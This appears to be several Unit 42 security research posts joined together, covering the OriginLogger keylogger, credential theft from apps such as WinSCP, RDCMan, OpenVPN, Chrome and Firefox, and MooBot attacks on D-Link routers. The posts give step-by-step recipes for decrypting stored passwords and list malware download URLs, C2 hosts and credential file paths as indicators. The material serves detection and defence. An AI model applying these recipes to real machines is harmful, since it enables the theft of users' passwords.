Count Channel Bio Owner Bot Name
41 Invest in bitcoin now and attain financial freedom Alaa Ahmed obomike_bot
25 Free Cannabis Cry_ptoSand sales3w7_bot, oasisx_bot, valiat073_bot
21 Atrium Investment Ltd: We Help You ACHIEVE YOUR LIFE GOALS Doris E. Athey Tino08Bot
20 Self Discipline, Consistency and humanity. Lucas Grayson Odion2023bot
18 Come Closer Anthony Forbes Anthonyforbes2023bot
14 Think it, Code It CodeOnce DeSpartan PWORIGIN_bot
12 Dream cha$er 4L Lurgard da Great johnwalkkerBot
11 coder..no system is safe.. Private crypt 100$..knowledge is power ☠️The Devil☠️( do not disturb )) Skiddoobot
10 PhD Engineering Alexander Macbill swft_bot

 

Table 2. Prominent Channels

Finally, one feature that is not utilized very often is the ability for OriginLogger to download an additional payload after infecting the victim system. In the samples discussed here, only two were configured to download additional malware.

Conclusion

OriginLogger, much like its parent Agent Tesla, is a commoditized keylogger that shares many overlapping similarities and code, but it’s important to distinguish between the two for tracking and understanding. Commercial keyloggers have historically catered to less advanced attackers, but as illustrated in the initial lure document analyzed here, this does not make attackers any less capable of using multiple tools and services to obfuscate and make analysis more complicated. Commercial keyloggers should be treated with equal amounts of caution as would be used with any malware.

Luckily, in this instance, because of the similarities between the two aforementioned keyloggers, detections and protections carried over from one generation to the next – albeit with slightly inaccurate signature naming.

Palo Alto Networks customers receive protections from both OriginLogger and its predecessor malware Agent Tesla through Cortex XDR and the Next-Generation Firewall with cloud-delivered security services including WildFire and Advanced Threat Prevention.

Credential Gathering From Third-Party Software

Executive Summary

There is a constant debate between usability and security in the software world. Many third-party programs can make their users’ lives easier and save them time by storing their credentials. However, as it turns out, this convenience often comes at the price of poor security, causing the risk of password theft. Credentials gathered in this manner can then be used during an actual cyberattack.

In this article, we will explain the dangers of credential theft. We will examine some common third-party software scenarios related to credential gathering, looking into how passwords are stored, how they can be retrieved and how to monitor these actions based on real-world attack scenarios.

Cortex XDR Customers are protected from such attacks using the Credential Gathering Protection Module released in Cortex 3.4 on Windows, Linux and MacOS agents.

Related Unit 42 topics Credential harvesting

The Dangers of Credential Theft: How Attackers Can Expand Their Access

It is clear that credential theft is bad. However, it is important to emphasize the scale of the impact that credential theft can have.

Many people tend to use the same password in different programs and rarely change their passwords. When the time comes to modify their passwords, many people follow a predictable pattern.

Thus, when attackers can get a password from one source, they can try to use it against other resources, including some that are more protected. So, for every program A that is well secured, the user could use the same password or pattern on program B that is less secure – which could result in making program A less secure.

Furthermore, if it turns out that a person is using their operating system password in other less secure locations, a whole new world of possibilities is open to the attacker.

Let’s say, for example, that person X uses the same password for his Windows account domain and a Linux FTP file server. In this scenario, person X uses the common program WinSCP to manage their files in the file server. Although WinSCP advises that saving passwords isn’t recommended, person X accesses this file server every week, so they prefer to save time and save their password.

The red box highlights the "Save password" option in WinSCP, which is specifically listed as "not recommended."
Figure 1. Password saving is not recommended by WinSCP.

As we will demonstrate later in this blog, the user’s password can easily be retrieved from where WinSCP stores it. An attacker who can get a foothold on X’s personal computer can get their domain account password – only because it is being saved insecurely. This is on top of the fact that the password is valid for connecting to the file server. This file server may contain files with sensitive information to which the attacker now has access. From there, the attacker can use tools like BloodHound to estimate how far they can spread within an organization.

Credential Gathering in Practice

Software: WinSCP

WinSCP is a popular SFTP client and FTP client for Microsoft Windows that is used to copy files between local Windows computers and remote servers using FTP, FTPS, SCP and SFTP.

Tested version:

5.19.6 (Build 12002 2022-02-22)

Where are credentials stored?

WinSCP stores the encrypted user’s password under the registry key HKCU\software\martin prikryl\winscp 2\sessions\<session_name> in a value called Password.

How can the credentials be recovered?

WinSCP performs symmetric mathematical operations on the bits of the user’s passwords. It takes each byte of the password, computes the complement to 0xFF (11111111), and after that, XORs it with the byte 0xA3 (10100011).

The encryption process comprises finding the complement and performing the XOR one time. The password is then stored in the Password registry value. Since these mathematical operations are symmetric, all we need to do is perform the same two operations once again, in reverse order, to get the original value.

For example, let's take a commonly used password: Aa123456. This is how WinSCP will store this password: 1D3D6D6E6F68696A.

In Figure 2, we see the steps to decrypt the password:

Steps to decrypt a password in WinSCP include performing the XOR with 0xA3 and finding the complement, as shown in the table.
Figure 2. Decrypting a password stored in WinSCP.

The password is saved along with the HostName and UserName. To get it from the Password registry value, we must find the index at the beginning of the password. This calculation is pretty easy – depending on the WinSCP version, the first or third byte of the registry value is the length of the username, hostname and password, concatenated. The start index is the following byte to the length, and its value is multiplied by two. Both the length and the start index are encrypted in the same way.

The UserName and HostName are also saved on different registry values, so we know their length and value. All we do is decrypt the Password registry value from the index: start index + username length + hostname length to length, and we will get our password.

The screenshot shows how to decrypt the Password registry value from the index in WinSCP: start index + username length + hostname length to length. The result is the password.
Figure 3. Location of username, hostname and password, concatenated.

In the wild

We have seen the following script executed in multiple customer environments:

A suspicious PowerShell script that Unit 42 has observed in multiple environments. The decoded script attempts to decrypt WinSCP passwords.
Figure 4. Suspicious PowerShell with encoded command.
  • -enc stands for EncodedCommand, meaning that a base-64-encoded string is used as the command.

In the decoded script, we can see an attempt to decrypt WinSCP passwords:

Decoded version of PowerShell script used for credential gathering.
Figure 5. PowerShell script for extracting and decrypting WinSCP’s passwords.

 

Red boxes show how the Credential Gathering Protection module in Cortex XDR identifies a suspicious registry operation.
Figure 6. Cortex XDR prevented attempts to read passwords stored in WinSCP.

Software: Git

Tested version:

2.35.1.windows.2

Where are credentials stored?

Git allows for the use of both passwords and Personal Access Tokens (PATs).

When users want to save time by saving their Git credentials, they can do it using the following command:

git config credential.helper 'store'

Using this command, Git will save the user’s credentials indefinitely on disk, in plain text.

Possible files containing passwords:

  • <userprofile>\.git-credentials
  • <userprofile>\.config\git\credentials

Git allows using PATs as credentials instead of the traditional use of passwords. These tokens are more modular, as any number of access tokens can be created, each with different permissions and expiration dates.

Although it is possible to control users’ actions in a more modular and granular way, each associated with a specific PAT, anyone who has the user’s PAT can view all repositories to which the user has access.

These tokens also appear in cleartext in the same files mentioned above.

How can the credentials be recovered?

Anyone who reads these files will see the username, password or token, and relevant Git repository in plain text.

Software: RDCMan

Tested version:

2.83

RDCMan manages multiple remote desktop connections. It is useful for managing server labs where you need regular access to machines, such as automated check-in systems and data centers.

Where are credentials stored?

When a user decides to save a password for a session using RDCMan, the default configuration file will be %localappdata%\Microsoft\Remote Desktop Connection Manager\RDCMan.settings

This file is an XML file that contains general metadata about each RDP connection.

Among the data, there is an XML tag called CredentialsProfiles, which has attracted our attention.

We can see that under this tag, there is another one called CredentialsProfiles, and inside there are credentialsProfile XML tags, with a Password tag.

A red box highlights the contents of the Password tag in the credentialsProfile XML tags in RDCMan.settings
Figure 7. Looking at the XML tags in RDCMan.settings

How can the credentials be recovered?

To retrieve the password, we will have to execute commands in the context of the person using the RDCMan program. This is because the password is being saved using the DATA Protection API (DPAPI), which enables symmetric encryption and decryption of any kind of data using the functions CryptProtectData and CryptUnprotectData, respectively.

So, to get the password, we need to call the function CryptUnprotectData.

Usually, the only user who can decrypt the data is a user with the same login credentials as the user who encrypted the data.

Although gathering credentials from RDCMan requires an additional step from the attacker than was needed in some of our other examples – running the software in the context of the relevant user – there is great value to the result for the attacker. If the effort is successful, it’s possible for the threat actor to get all the users and passwords for all of the machines that this specific user connects to.

Once the attacker is able to execute commands in the context of the user, all that remains in order to gather credentials is to:

  1. Open the RDCMan.settings file and check for the password XML tag.
  2. Decode the string in the tag with base64.
  3. Call CryptUnprotectData with the decoded password string.
  4. Decode the result using UTF-8 (or other relevant formats).
  5. Remove unnecessary null characters.

Looking at the example above, the password saved in the file was:

AQAAANCMnd8BFdERjHoAwE/Cl+sBAAAA8/nnW5aFNUi0AKiTG4y9UQAAAAACAAAAAAAQZgAAAAEAACAAAADIjLLw0X4z9RDdWgPpqabLU7hTcJ1HVlFklpzX3eA14QAAAAAOgAAAAAIAACAAAAB01OvDCNCjaEhrq8J8hRm/SKycef7nR52ZkqcPLJqMsCAAAACg2htaeRsutDziS3FISeEAg3DsBpGxBGpPeWlUSVnXOkAAAAB5Tei9g5KWcVIhOKQ2cXxr5ONUOHMEEH5h3Lmp12mPlWaaZ6y8dGIVz8WnNKr4e73dhqNU8NyzI7RZBamS6DG6

And the decrypted password is Aa123456.

The red box highlights the results of password decryption efforts that complete credential gathering targeting RDCMan.
Figure 8. Recovering a password from RDCMan.

Software: OpenVPN

Tested version:

2.5.029

OpenVPN is a virtual private network system that implements techniques to create secure point-to-point or site-to-site connections in routed or bridged configurations and remote access facilities.

Where are credentials stored?

OpenVPN stores the user’s password under the registry key HKCU\software\openvpn-gui\configs\<session_name> in a value called auth-data.

How can the credentials be recovered?

OpenVPN also uses the DPAPI mechanism, with the additional optional entropy parameter (which can be set to NULL).

When an optional entropy DATA_BLOB structure was used in the encryption phase, that same DATA_BLOB structure must be used for the decryption phase.

In the case of OpenVPN, the entropy is saved in a registry value called entropy. The entropy registry value is also stored in the path HKCU\software\openvpn-gui\configs\<session_name>

So, calling CryptUnprotectData with the password from auth-data and entropy (from entropy) will give us the session password.

The entropy registry value contains an extra byte of 00, so we just need to omit it.

Above, the PowerShell script for recovering an OpenVPN password. Below, the way auth-data and entropy registry values are shown via reg.exe
Figure 9. Above, the PowerShell script for recovering an OpenVPN password. Below, the way auth-data and entropy registry values are shown via reg.exe (POC).

Software: Chromium-based Browsers

Tested version:

  • Google Chrome – Tested version: 103.0.5060.53 (Official Build) (64-bit)
  • Microsoft Edge – Tested version: 103.0.1264.37 (Official Build) (64-bit)
  • Opera – Tested version: 88.0.4412.53

The Chromium projects include Chromium, the open-source project behind the Google Chrome browser.

In a typical usage routine, many people tend to save passwords while surfing the internet.

The screenshot shows a redacted version of the screen that appears when checking stored passwords in Google Chrome settings.
Figure 10. Passwords saved by Google Chrome Version 102.0.5005.115 (Official Build) (64-bit).

Where are credentials stored?

When using a Chromium-based browser, like Microsoft Edge, Opera or Google Chrome, passwords are located encrypted in an SQLite database file, usually called login data.

Each profile has a password database – its login data file.

The key used to encrypt the passwords is located in the parent folder, in a JSON file called local state.

For example:

login data locations:

  • Google Chrome: %localappdata%\google\chrome\user data\<PROFILE>\login data
  • Microsoft Edge: %localappdata%\microsoft\edge\user data\<PROFILE>\login data
  • Opera: %appdata%\opera software\opera stable\<PROFILE>\login data

local state locations:

  • Google Chrome: %localappdata%\google\chrome\user data\local state
  • Microsoft Edge: %localappdata%\microsoft\edge\user data\local state
  • Opera: %appdata%\opera software\opera stable\local state

How can the credentials be recovered?

Each password in the login data database is encrypted using the Advanced Encryption Standard (AES), with GCM mode. AES GCM is a symmetrical encryption method, so the same key is valid for both encryption and decryption. The AES algorithm uses a different key for every 128-bit block, which is based on the calculation of the previous block. For the first block, there is an option to use the Initialization Vector (IV).

To decrypt a password that a Chromium-based browser saves, we need to have:

  1. The encrypted password.
  2. The initialization vector.
  3. The AES key.

Let’s see how we can retrieve each of those:

A. The encrypted password.

Can be exported from the login data database – the encrypted password is taken from the password_value column, from the letter in the 15th position to the end – 16 letters. [15:-16]

B. The initialization vector.

Located in the same password_value field column, from the letter in the third position to the letter in the 15th position. [3:15]

C. The AES key.

Written in the local state JSON file, under keys os_crypt and encrypted_key, decoded with base64.

Chromium-based browsers save the AES key using the DPAPI mechanism, so to get it, we will have to decode it from base64 and use CryptUnprotectData in the user’s context.

Example from Google Chrome:

Example from Google Chrome of a password saved in the local state JSON file of Google Chrome. Visible phrases include os_crypt, encrypted_key and password_manager.
Figure 11. Password that is being saved in local state JSON file of Google Chrome.

It is being saved with a prefix of five letters at the beginning: DPAPI.

The decoded password is shown. Highlighted in red at the beginning is a prefix of five letters: DPAPI
Figure 12. The decoded password that was saved in Google Chrome.

If the attacker is able to run in the context of the user, all that is necessary to complete gathering user credentials is:

  1. Copy both login data and local state files.
  2. Get the AES GCM key from the local state JSON file.
  3. Decode (base64), decrypt (CryptUnprotectData) and remove the padding from the key.
  4. Decrypt each password in the login data database, using the decrypted AES GCM key.
A proof of concept for recovering passwords that were saved in Chrome - the screenshot shows the outcome of python_Chrome_pass.py, with sensitive information redacted.
Figure 13. POC for recovering passwords that were saved in Chrome.

You can read more about how to extract Chrome passwords in Python.

In the wild

We have seen the following DLL running from excel.exe using regsvr32.exe with the following command line:

C:\windows\system32\regsvr32.exe
C:\users\<username>\appdata\local\uolegxnwf\kgnkudbadmpogg.dll

(SHA256 of kgnkudbadmpogg.dll: 6599FEE8C7ADF30A00889A7070600F472F8CEAD8EA4DD1A85E724ED15F2AED0F)

After a chain of events, the final payload was trying to access Microsoft Edge credentials files:

  • The login data file (SQLite database file)
    C:\users\<username>\appdata\local\microsoft\edge\user data\default\login data
  • The local state file (contains the encryption key)
    C:\users\<username>\appdata\local\microsoft\edge\user data\local state
Red boxes highlight the Credential Gathering module and the key file paths observed.
Figure 14. Cortex XDR detected attempts to read passwords saved in the Microsoft Edge browser.

Software: Firefox Browser

Tested version:

Firefox Version 101.0.1 (64-bit)

The password-saving behavior pattern is also relevant when using other browsers, such as Mozilla Firefox.

Screenshot of stored passwords in Mozilla Firefox with key info redacted.
Figure 15. Passwords that are being saved by Firefox Version 101.0.1 (64-bit).

Where are credentials stored?

Similar to Chromium-based browsers, in the Mozilla Firefox browser, each profile also has its own password file.

This file is called logins.json and is located in %appdata%\mozilla\firefox\profiles\<PROFILE>\logins.json

Both username and password are saved encrypted.

The screenshot shows encryptedUsername and encryptedPassword, among other logins data
Figure 16. Password saved in the logins.json file of Firefox.

How can the credentials be recovered?

Each username and password in the logins.json file is encrypted using the PKCS #11 cryptography standard. Firefox has developed the NSS library to adopt this standard into its browser (nss3.dll).

NSS stores private keys in a file called key3.db or key4.db, depending on the NSS version.

To retrieve the user’s passwords, the attacker will have to access one of these files and the logins.json file.

So, if the attacker can gain access to run on the same machine, the process of stealing the passwords will be:

  1. The attacker copies the logins.json file.
  2. Loads the NSS library (nss3.dll)
  3. Decodes (base64) the encryptedUsername and encryptedPassword from the copy of logins.json.
  4. Stores each of the inputs in a SecItem object, which is later used throughout NSS to pass blocks of binary data back and forth.
  5. Creates SecItem objects for output.
  6. Decrypts each encryptedUsername and encryptedPassword input object, and stores the data in the new SecItem output objects, using the PK11 decryption function from nss3.dll.

Unlike the case of Chromium-based browsers, the attacker doesn’t have to run in a user’s context to get the person’s passwords, but can take advantage of any user who has permission to access the file system profile of the target user.

Red boxes highlight where User S is able to gather credentials from User D.
Figure 17. User S got passwords belonging to user D that were saved in Firefox profile 2. (POC)

In the wild

We have seen the following script executed:

A suspicious obfuscated PowerShell script that attempts to gather credentials from Mozilla Firefox.
Figure 18. Suspicious obfuscated PowerShell script.

After decoding:

The deobuscated PowerShell script reveals a series of links as shown
Figure 19. De-obfuscated PowerShell script.

The script:

  1. Creates the folder %localappdata%\ujXgAD
  2. Tries to create Invoke-WebRequest for each of the links in $Links, downloads a DLL and saves it in the folder mentioned in step A with the name rRXqwGvGNR.wTj
  3. Breaks after the first successful execution.

Next, we saw that a DLL was created on the endpoint and regsvr32.exe was used with the following command line:

C:\WINDOWS\system32\regsvr32.exe
C:\Users\<USERNAME>\AppData\Local\Temp\..\ujXgAD\rRXqwGvGNR.wTj

Note that the path has an evasion in it: By using \..\ to go back to the Local folder, the attacker avoids accessing it directly.

After using regsvr32.exe:

A. The DLL copies itself to a random folder with a random name, with a DLL extension:
C:\Users\<USERNAME>\AppData\Local\<random_folder_name>\<random_dll_name>.dll

B. The DLL executes a couple of discovery commands:

    1. systeminfo – To list machine information.
    2. ipconfig /all – To list all network interfaces on the machine.
    3. nltest.exe /dclist: – To list all domain controllers in the domain.

C. The DLL creates and executes two files based on certutil.exe with random names:

  1. One of them has a new random name but is still signed by Microsoft.
  2. The other one is a mangled version of certutil – keeping the original name, but with different functionality, and no signature.

D. Step C above is done twice.

Unsigned file SHA256:
A88C344F3F80F8A3EA2E9BA0687FEBCEE2A730FD9AC037D54C4FD21C0AB91039

Certutil SHA256 - Note that this file is benign:
D252235AA420B91C38BFEEC4F1C3F3434BC853D04635453648B26B2947352889

The unsigned certutil.exe then tries to access password files, both for Chromium-based and Firefox-based browsers.

When checking the links from Figure 19, only two links worked:

DLLs downloaded as part of this credential gathering attack include lw1JF63zARLUV8UwpwGnWpgg.dll and RwuuPYoVei7FkJB.dll
Figure 20. DLLs that we were able to download.
  • First downloaded DLL:
    hxxps://www[.]yell[.]ge/nav_logo/AEnTP/
    Downloaded filename: RwuuPYoVei7FkJB.dll
    (SHA256: A1D513E4A5C83895E5769C994C4D319959EF5AE3F679CE6C0C5211B5BECA7695)
  • Second downloaded DLL:
    hxxps://yakosurf[.]com/wp-includes/S/
    Downloaded filename: lw1JF63zARLUV8UwpwGnWpgg.dll
    (SHA256: 1B8638333751EFCB6B5332C801C11DF0DE3D7077C6ACEA1D663C0302519D7172)

In both cases, it is actually the same DLL, except for a small difference that changes the SHA256 hash.

Looking into this sample, we identified the first DLL as part of the Emotet malware family.

Red boxes highlight how the Credential Gathering Protection module identifies key file paths.
Figure 21. Cortex XDR prevented attempts to read passwords saved in the Firefox browser.

Cortex XDR stops this operation synchronously, so the next attack stages are not performed. This malware tries to read passwords in this order: first Firefox, then Microsoft Edge and later, Google Chrome.

For the demonstration, we will illustrate Cortex XDR with report mode. We will see that the Credential Gathering Protection Module also detects attempts to read Chromium-based browsers' saved passwords.

Red boxes how the Cortex XDR Credential Gathering Protection module identifies key file paths.
Figure 22. Cortex XDR detected attempts to read passwords saved in the Microsoft Edge browser.
Red boxes highlight how the Credential Gathering Module identifies key file paths.
Figure 23. Cortex XDR detected attempts to read passwords saved in the Google Chrome browser.

Emotet?

Since we saw two different cases involving Emotet, we looked a bit deeper into this malware family and its methods for third-party credential gathering. We saw that sometimes malware does not even need to implement all the logical conditions on its own. It can just wrap existing tools, like the WebBrowserPassView Nirsoft tool, to reveal the passwords stored by the web browsers.

WebBrowserPassView.exe shows usernames, passwords and the file path that stores each of them. While sensitive info is redacted, the web browser from which each password was taken is visible.
Figure 24. WebBrowserPassView.exe shows usernames, passwords and the file path that stores each of them.

We can see the login data file for Chromium-based browsers, and the logins.json file for the Firefox browser.

Red boxes highlight how the Credential Gathering Protection module identifies key file paths.
Figure 25. Cortex XDR prevented attempts to read browsers' saved passwords by WebBrowserPassView.exe.

Conclusion

It turns out that the way certain third-party software stores credentials is less secure than we thought. Most of these programs store the user’s credentials on the local disk, via file or registry values. This fact can be the one weak spot in the chain that attackers wish to find, giving them the access to perform an attack against an organization.

Palo Alto Networks customers using Cortex XDR receive protections using the new Credential Gathering Protection Module for the scenarios described above as well as other credential gathering techniques not mentioned in this write-up. Additional layers of protection – including Local Analysis, Behavioral Threat Protection, BIOC and Analytics BIOCs rules – are also available.

Palo Alto Networks customers that use WildFire receive protections from tools implementing these credential gathering attempts.

Nirsoft tools are marked as grayware in WildFire and are blocked by the XDR Agent.

Indicators of Compromise

Unauthorized access to the following registry values
  • HKCU\software\martin prikryl\winscp 2\sessions\<session_name>\Password
  • HKCU\software\openvpn-gui\configs\<session_name>\auth-data
  • HKCU\software\openvpn-gui\configs\<session_name>\entropy
Unauthorized access to the following files
  • <userprofile>\.git-credentials
  • <userprofile>\.config\git\credentials
  • %localappdata%\Microsoft\Remote Desktop Connection Manager\RDCMan.settings
  • %localappdata%\google\chrome\user data\<PROFILE>\login data
  • %localappdata%\microsoft\edge\user data\<PROFILE>\login data
  • %appdata%\opera software\opera stable\<PROFILE>\login data
  • %localappdata%\google\chrome\user data\local state
  • %localappdata%\microsoft\edge\user data\local state
  • %appdata%\opera software\opera stable\local state
  • %appdata%\mozilla\firefox\profiles\<PROFILE>\logins.json
  • %appdata%\mozilla\firefox\profiles\<PROFILE>\key<3/4>.json
Malicious hashes
6599FEE8C7ADF30A00889A7070600F472F8CEAD8EA4DD1A85E724ED15F2AED0F

A88C344F3F80F8A3EA2E9BA0687FEBCEE2A730FD9AC037D54C4FD21C0AB91039

A1D513E4A5C83895E5769C994C4D319959EF5AE3F679CE6C0C5211B5BECA7695

1B8638333751EFCB6B5332C801C11DF0DE3D7077C6ACEA1D663C0302519D7172

Additional Resources

Mirai Variant MooBot Targeting D-Link Devices

Executive Summary

In early August, Unit 42 researchers discovered attacks leveraging several vulnerabilities in devices made by D-Link, a company that specializes in network and connectivity products. The vulnerabilities exploited include:

  • CVE-2015-2051: D-Link HNAP SOAPAction Header Command Execution Vulnerability
  • CVE-2018-6530: D-Link SOAP Interface Remote Code Execution Vulnerability
  • CVE-2022-26258: D-Link Remote Command Execution Vulnerability
  • CVE-2022-28958: D-Link Remote Command Execution Vulnerability

If the devices are compromised, they will be fully controlled by attackers, who could utilize those devices to conduct further attacks such as distributed denial-of-service (DDoS) attacks. The exploit attempts captured by Unit 42 researchers leverage the aforementioned vulnerabilities to spread MooBot, a Mirai variant, which targets exposed networking devices running Linux.

While D-Link has published security bulletins regarding all the vulnerabilities mentioned here, some users may be running unpatched or older versions or devices. Unit 42 strongly recommends applying upgrades and patches where possible.

Palo Alto Networks Next-Generation Firewall customers receive protections through cloud-delivered security services such as IoT Security, Advanced Threat Prevention, WildFire and Advanced URL Filtering, which can detect and block the exploit traffic and malware.

Related Unit 42 Topics IoT, Mirai

Campaign Overview

The whole attack process is shown in Figure 1.

1. Attacker exploits vulnerable devices by leveraging CVE-2015-2051, CVE-2018-6530, CVE-2022-26528 and CVE-2022-28958. 2. The downloader requests MooBot binary from remote host. 3. Communication with C2 server. 4. The compromised devices launches an attack on other devices based on C2 command.
Figure 1. Campaign overview.

Exploited Vulnerabilities

Four known vulnerabilities were exploited in this attack. Upon successful exploitation, the wget utility executes to download MooBot samples from the malware infrastructure and then executes the downloaded binaries. Vulnerability-related information is shown in Table 1.

ID Vulnerability Description Severity
1 CVE-2015-2051 D-Link HNAP SOAPAction Header Command Execution Vulnerability CVSS Version 2.0: 10.0 High
2 CVE-2018-6530 D-Link SOAP Interface Remote Code Execution Vulnerability CVSS Version 3.0: 9.8 Critical
3 CVE-2022-26258 D-Link Remote Command Execution Vulnerability CVSS Version 3.0: 9.8 Critical
4 CVE-2022-28958 D-Link Remote Command Execution Vulnerability CVSS Version 3.0: 9.8 Critical

Table 1. List of exploited vulnerabilities.

D-Link Exploit Payloads

The attacker utilizes four D-Link vulnerabilities that could lead to remote code execution and download a MooBot downloader from host 159.203.15[.]179.

1. CVE-2015-2051: D-Link HNAP SOAPAction Header Command Execution Vulnerability

CVE-2015-2051 exploit payload, showing the connection to host 159.203.15[.]179, from which a MooBot downloader can be accessed.
Figure 2. CVE-2015-2051 exploit payload.
The exploit targeting the older D-Link routers takes advantage of vulnerabilities in the HNAP SOAP interface. An attacker can perform code execution through a blind OS command injection.

2. CVE-2018-6530: D-Link SOAP Interface Remote Code Execution Vulnerability

CVE-2018-6530 exploit payload, showing the connection to host 159.203.15[.]179, from which a MooBot downloader can be accessed.
Figure 3. CVE-2018-6530 exploit payload.
The exploit works due to the older D-Link router's unsanitized use of the “service” parameters in requests made to the SOAP interface. The vulnerability can be exploited to allow unauthenticated remote code execution.

3. CVE-2022-26258: D-Link Remote Code Execution Vulnerability

CVE-2022-26258 exploit payload, showing the connection to host 159.203.15[.]179, from which a MooBot downloader can be accessed.
Figure 4. CVE-2022-26258 exploit payload.
The exploit targets a command injection vulnerability in the /lan.asp component. The component does not successfully sanitize the value of the HTTP parameter DeviceName, which in turn can lead to arbitrary command execution.

4. CVE-2022-28958: D-Link Remote Code Execution Vulnerability

CVE-2022-28958 exploit payload, showing the connection to host 159.203.15[.]179, from which a MooBot downloader can be accessed.
Figure 5. CVE-2022-28958 exploit payload.
The exploit targets a remote command execution vulnerability in the /shareport.php component. The component does not successfully sanitize the value of the HTTP parameter value, which can lead to arbitrary command execution.

Malware Analysis

All the artifacts related to this attack are shown in the following table:

File Name SHA256 Description
rt B7EE57A42C6A4545AC6D6C29E1075FA1628E1D09B8C1572C848A70112D4C90A1 A script downloader. It downloads MooBot onto the compromised system and renames the binary files to Realtek
wget[.]sh 46BB6E2F80B6CB96FF7D0F78B3BDBC496B69EB7F22CE15EFCAA275F07CFAE075 The script downloader. It downloads MooBot onto the compromised system, and renames the binary files to Android.
arc 36DCAF547C212B6228CA5A45A3F3A778271FBAF8E198EDE305D801BC98893D5A MooBot executable file.
arm 88B858B1411992509B0F2997877402D8BD9E378E4E21EFE024D61E25B29DAA08 MooBot executable file.
arm5 D7564C7E6F606EC3A04BE3AC63FDEF2FDE49D3014776C1FB527C3B2E3086EBAB MooBot executable file.
arm6 72153E51EA461452263DBB8F658BDDC8FB82902E538C2F7146C8666192893258 MooBot executable file.
arm7 7123B2DE979D85615C35FCA99FA40E0B5FBCA25F2C7654B083808653C9E4D616 MooBot executable file.
i586 CC3E92C52BBCF56CCFFB6F6E2942A676B3103F74397C46A21697B7D9C0448BE6 MooBot executable file.
i686 188BCE5483A9BDC618E0EE9F3C961FF5356009572738AB703057857E8477A36B MooBot executable file.
mips 4567979788B37FBED6EEDA02B3C15FAFE3E0A226EE541D7A0027C31FF05578E2 MooBot executable file.
mipsel 06FC99956BD2AFCEEBBCD157C71908F8CE9DDC81A830CBE86A2A3F4FF79DA5F4 MooBot executable file.
sh4 4BFF052C7FBF3F7AD025D7DBAB8BD985B6CAC79381EB3F8616BEF98FCB01D871 MooBot executable file.
x86_64 4BFF052C7FBF3F7AD025D7DBAB8BD985B6CAC79381EB3F8616BEF98FCB01D871 MooBot executable file.

Table 2. Attack-related artifacts.

Unit 42 researchers conducted analysis on the downloaded malware sample. Based on its behavior and patterns, we believe that the malware samples that were hosted on 159.203.15[.]179 relate to a variant of the Mirai botnet called MooBot.

The most obvious feature of MooBot is the executable file containing the string w5q6he3dbrsgmclkiu4to18npavj702f, which will be used to generate random alphanumeric strings as shown.
Figure 6. MooBot random string generator.

The most obvious feature of MooBot is the executable file containing the string w5q6he3dbrsgmclkiu4to18npavj702f, which will be used to generate random alphanumeric strings.

Upon execution, the binary file prints get haxored! to the console, spawns processes with random names and wipes out the executable file.

The screenshot shows examples of MooBot spawning processes with random names.
Figure 7. MooBot creates processes.

As a variant, MooBot inherits Mirai’s most significant feature – a data section with embedded default login credentials and botnet configuration – but instead of using Mirai’s encryption key, 0xDEADBEEF, MooBot encrypts its data with 0x22.

Red arrows highlight the decode username and the decode password
Figure 8. MooBot configuration decode function.

After decoding its C2 server vpn.komaru[.]today from configuration, MooBot will send out a message to inform the C2 server that a new MooBot is online. The message starts with the hardcoded magic value 0x336699.

At the time of our analysis, the C2 server was offline. According to the code analysis, MooBot will also send heartbeat messages to the C2 server and parse commands from C2 to start a DDoS attack on a specific IP address and port number.

Conclusion

The vulnerabilities mentioned above have low attack complexity but critical security impact that can lead to remote code execution. Once the attacker gains control in this manner, they could take advantage by including the newly compromised devices into their botnet to conduct further attacks such as DDoS.

Therefore, we strongly recommend applying patches and upgrades when possible.

Palo Alto Networks customers receive protections from the vulnerability and malware through the following products and services:

  • Next-Generation Firewalls with a Threat Prevention security subscription can block the attacks with Best Practices via Threat Prevention signatures 38600, 92960, 92959 and 92533.
  • WildFire can stop the malware with static signature detections.
  • The Palo Alto Networks IoT security platform can leverage network traffic information to identify the vendor, model and firmware version of a device and identify specific devices that are vulnerable to the aforementioned CVEs.
  • Advanced URL Filtering and DNS Security are able to block the C2 domain and malware hosting URLs.
  • In addition, IoT Security has an inbuilt machine learning-based anomaly detection that can alert the customer if a device exhibits non-typical behavior, such as a sudden appearance of traffic from a new source, an unusually high number of connections or an inexplicable surge of certain attributes typically appearing in IoT application payloads.

Indicators of Compromise

Infrastructure

MooBot C2

vpn.komaru[.]today

Malware Host

http://159.203.15[.]179/wget.sh
http://159.203.15[.]179/wget.sh3
http://159.203.15[.]179/mips
http://159.203.15[.]179/mipsel
http://159.203.15[.]179/arm
http://159.203.15[.]179/arm5
http://159.203.15[.]179/arm6
http://159.203.15[.]179/arm7
http://159.203.15[.]179/sh4
http://159.203.15[.]179/arc
http://159.203.15[.]179/sparc
http://159.203.15[.]179/x86_64
http://159.203.15[.]179/i686
http://159.203.15[.]179/i586

Artifacts

Shell Script Downloader

Filename SHA256
rt B7EE57A42C6A4545AC6D6C29E1075FA1628E1D09B8C1572C848A70112D4C90A1
wget[.]sh 46BB6E2F80B6CB96FF7D0F78B3BDBC496B69EB7F22CE15EFCAA275F07CFAE075

Table 3. Shell script downloader.

MooBot Sample

Filename SHA256
arc 36DCAF547C212B6228CA5A45A3F3A778271FBAF8E198EDE305D801BC98893D5A
arm 88B858B1411992509B0F2997877402D8BD9E378E4E21EFE024D61E25B29DAA08
arm5 D7564C7E6F606EC3A04BE3AC63FDEF2FDE49D3014776C1FB527C3B2E3086EBAB
arm6 72153E51EA461452263DBB8F658BDDC8FB82902E538C2F7146C8666192893258
arm7 7123B2DE979D85615C35FCA99FA40E0B5FBCA25F2C7654B083808653C9E4D616
i586 CC3E92C52BBCF56CCFFB6F6E2942A676B3103F74397C46A21697B7D9C0448BE6
i686 188BCE5483A9BDC618E0EE9F3C961FF5356009572738AB703057857E8477A36B
mips 4567979788B37FBED6EEDA02B3C15FAFE3E0A226EE541D7A0027C31FF05578E2
mipsel 06FC99956BD2AFCEEBBCD157C71908F8CE9DDC81A830CBE86A2A3F4FF79DA5F4
sh4 4BFF052C7FBF3F7AD025D7DBAB8BD985B6CAC79381EB3F8616BEF98FCB01D871
x86_64 3B12ABA8C92A15EF2A917F7C03A5216342E7D2626B025523C62308FC799B0737

Table 4. MooBot samples.

Additional Resources

New Mirai Variant Targeting Network Security Devices - Unit 42, Palo Alto Networks
Network Attack Trends: Internet of Threats (November 2020-January 2021) - Unit 42, Palo Alto Networks